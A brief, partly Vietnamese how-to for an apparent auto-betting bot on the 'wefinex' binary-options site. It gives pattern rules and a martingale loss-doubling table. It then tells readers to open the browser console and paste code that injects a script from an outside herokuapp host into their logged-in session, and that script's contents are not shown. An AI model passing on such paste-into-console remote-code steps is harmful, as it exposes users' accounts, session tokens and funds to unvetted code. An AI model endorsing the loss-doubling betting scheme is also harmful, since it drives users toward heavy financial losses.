
FLow rule

var listRule = [
    "xx->d",  
    "dd->x", 
    "dddd-> ",
    "xxxx-> ", 
];

var lostValueSet = {
       0: 1,
    1: 2,
    2: 4,
    3: 8,
    4: 16,
    5: 32,
    6: 64,
    7: 128,
    8: 250,
};


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console


3s cuoi danh
//check lost more > 3

Remember last choose and "gap thep" if lost money

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/version/v7-2/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
